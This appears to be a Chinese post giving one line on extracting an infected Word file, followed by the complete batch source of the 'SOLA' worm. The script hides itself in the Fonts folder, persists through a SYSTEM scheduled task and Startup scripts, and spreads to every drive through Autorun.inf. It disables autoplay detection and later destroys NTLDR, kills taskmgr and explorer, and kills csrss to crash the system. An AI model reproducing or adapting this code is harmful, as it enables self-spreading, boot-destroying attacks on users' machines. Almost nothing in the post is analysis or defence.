首先用PE进入系统后用PE自带的zip或rar解压感染的Word文件,解压出来后出现三个文件:分别是,Function.dll,sola****.bat, ****.doc,注意都是隐藏文件。
@echo off set sola=%systemroot%\Fonts\HIDESE~1 set setup=%systemroot%\Fonts\HIDESE~1\solasetup FOR /F "tokens=1" %%i in ('date /t') do set Realdate=%%i FOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\explorer.exe') do if /I "%%j"=="explorer.exe" set Date=%%i if "%1"=="-Install" goto Install if "%1"=="-Run" goto Run if "%1"=="-Tenbatsu" goto Tenbatsu if "%1"=="-Kill" goto Kill if "%1"=="-Killself" goto Killself :CheckSign if "%1"=="-USB" start /max .. if "%1"=="-USB" cd SOLA if exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open :FileCopy set selfname=%0 :HIDESelf date %Date% md %systemroot%\Fonts\HIDESELF...\ date %RealDate% if not "%1"=="-USB" type %selfname%>%systemroot%\Fonts\HIDESE~1\sola.bat if "%1"=="-USB" type sola.bat>%systemroot%\Fonts\HIDESE~1\sola.bat type Function.dll>%systemroot%\Fonts\HIDESE~1\Function.exe echo On Error Resume Next>%systemroot%\Fonts\HIDESE~1\SOLA.VBS echo set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\SOLA.VBS echo ws.run "cmd /c %sola%\SOLA.BAT -Install",0 >>%systemroot%\Fonts\HIDESE~1\SOLA.VBS cscript %systemroot%\Fonts\HIDESE~1\SOLA.VBS echo>%systemroot%\Fonts\HIDESE~1\sola.sign del %systemroot%\Fonts\HIDESE~1\SOLA.VBS goto Open :Install :PackerSetup %SystemDrive% cd %systemroot%\Fonts\HIDESE~1 if exist Function.exe taskkill /f /im Function.exe if exist solasetup rd /s /q solasetup md solasetup cd solasetup copy ..\Function.exe Function.dll ..\Function.exe -x cd.. date %Date% type %setup%\rar.exe >%systemroot%\system32\rar.exe date %Realdate% copy %setup%\Function.dll %sola%\Function.dll attrib %sola%\Function.dll +s +h +r rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll del Function.exe :Mainsetup set A0001=copy set A0002=attrib set A0003=echo set A0005=Shell Hardware Detection tasklist >%sola%\task.txt FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i %A0001% %systemroot%\system32\cmd.exe %sola%\%svchost% del %sola%\task.txt :Tasks %A0002% %systemroot%\Tasks\Tasks.job -s -h -r del %systemroot%\Tasks\Tasks.job date %Date% type %setup%\Tasks.xxx>%systemroot%\Tasks\Tasks.job schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail date %RealDate% goto TaskSuc :TaskFail %homedrive% cd "%ALLUSERSPROFILE%" cd 「开始」菜单\程序\启动 date %Date% %A0003% On Error Resume Next>SOLA.VBS %A0003% set ws=wscript.createobject("wscript.shell")>>SOLA.VBS %A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS %A0001% SOLA.VBS %sola%\SOLA.VBS %A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasks date %RealDate% :TaskSuc %A0002% %systemroot%\Tasks\Tasks.job +s +h +r date %Date% %A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe date %RealDate% :NoAutoPlay net stop "%A0005%" %A0003% Windows Registry Editor Version 5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg %A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\HIDESE~1\Regedit.reg %A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.reg regedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg ::End of Install goto End&if errorlevel 1 exit ::End of Install :Run set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动 set taskroot=%systemroot%\Tasks :RunTimeChk if not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txt FOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%i if /i %RunTime% leq 0 goto Virus set /a RunTime=%Runtime%-1 echo !%Runtime%>%sola%\RunTime.txt :Diskchk echo On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS echo set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS echo ws.run "%sola%\svchost.exe /c %setup%\RecentInf.bat",0 >>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1 for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT© /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r :Turn if "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C: if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D: if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E: if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F: if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G: if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H: if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I: if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J: if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K: if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L: if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M: if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N: if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O: if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P: if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q: if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R: if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S: if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T: if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U: if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V: if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W: if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X: if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y: if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z: if "%C%"=="2" vol C:&if errorlevel 1 set C=1 if "%D%"=="2" vol D:&if errorlevel 1 set D=1 if "%E%"=="2" vol E:&if errorlevel 1 set E=1 if "%F%"=="2" vol F:&if errorlevel 1 set F=1 if "%G%"=="2" vol G:&if errorlevel 1 set G=1 if "%H%"=="2" vol H:&if errorlevel 1 set H=1 if "%I%"=="2" vol I:&if errorlevel 1 set I=1 if "%J%"=="2" vol J:&if errorlevel 1 set J=1 if "%K%"=="2" vol K:&if errorlevel 1 set K=1 if "%L%"=="2" vol L:&if errorlevel 1 set L=1 if "%M%"=="2" vol M:&if errorlevel 1 set M=1 if "%N%"=="2" vol N:&if errorlevel 1 set N=1 if "%O%"=="2" vol O:&if errorlevel 1 set O=1 if "%P%"=="2" vol P:&if errorlevel 1 set P=1 if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1 if "%R%"=="2" vol R:&if errorlevel 1 set R=1 if "%S%"=="2" vol S:&if errorlevel 1 set S=1 if "%T%"=="2" vol T:&if errorlevel 1 set T=1 if "%U%"=="2" vol U:&if errorlevel 1 set U=1 if "%V%"=="2" vol V:&if errorlevel 1 set V=1 if "%W%"=="2" vol W:&if errorlevel 1 set W=1 if "%X%"=="2" vol X:&if errorlevel 1 set X=1 if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1 if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1 if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist "%runroot%\SOLA.VBS" copy "%sola%\SOLA.VBS" "%runroot%\SOLA.VBS" if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" sleep 2000 goto Turn ::End of Run goto End&if errorlevel 1 exit ::End of Run :Virus if not "%Runtime%"=="0" goto VirusChk set /a RunTime=%Runtime%-1 echo !%Runtime%>%sola%\RunTime.txt cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" echo On Error Resume Next>TENBATSU.VBS echo set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBS echo ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBS goto Diskchk :VirusChk if not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Kill goto Diskchk :Tenbatsu :KillNTLDR attrib %systemdrive%\NTLDR -s -h -r copy /Y %systemdrive%\NTLDR %sola%\NTLDR echo NO NTLDR>%systemdrive%\NTLDR ::attrib %systemdrive%\NTLDR +s +h +r :PauseSFC start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()" :KillTaskmgr del /q /a %systemroot%\system32\dllcache\taskmgr.exe taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500 ren %systemroot%\system32\taskmgr.exe taskmgr.xxx :KillExplorer taskkill /f /im explorer.exe >nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()" & sleep 500 ren %systemroot%\explorer.exe explorer.xxx start /max %setup%\TENBATSU.BAT :Timeset sleep 660000 if exist %sola%\Killself Exit :Kill attrib %systemdrive%\NTLDR -s -h -r echo NO NTLDR>%systemdrive%\NTLDR ::attrib %systemdrive%\NTLDR +s +h +r tasklist >%sola%\Task.txt FOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%i goto Diskchk :KillSelf :StartExplorer ren %systemroot%\explorer.xxx explorer.exe start %systemroot%\explorer.exe :BackNTLDR attrib %systemdrive%\NTLDR -s -h -r copy /Y %sola%\NTLDR %systemdrive%\NTLDR attrib %systemdrive%\NTLDR +s +h +r :RenTmg ren %systemroot%\system32\taskmgr.xxx taskmgr.exe :KillVirus copy %setup%\KillVirus.txt %sola%\KillVirus.txt C: cd\ md ~Install cd ~Install rar x -hpkakenhi200601 %setup%\SolaKiller.rar mshta "javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()" rd /s /q %setup% attrib %systemroot%\Tasks\Tasks.job -s -h -r del %systemroot%\Tasks\Tasks.job cd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动" if exist sola.vbs del sola.vbs if exist tenbatsu.vbs del tenbatsu.vbs start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt del %sola%\sola.bat Exit :Open if "%1"=="-USB" Exit goto GetName :BackOpen if not exist "%Name%" exit call "%Name%" :Save FOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%i rar -m0 -ep -ep1 a "%PackName%" "%Name%" echo %Code%>>"%PackName%" :Del attrib "%Name%" -s -h -r del "%Name%" attrib Function.dll -s -h -r del Function.dll attrib %0 -s -h -r del %0 exit ::CMD program will stop there. :GetName set Code=SOLA_2.0_12695220593667 set Name=建设总结.doc goto Backopen :End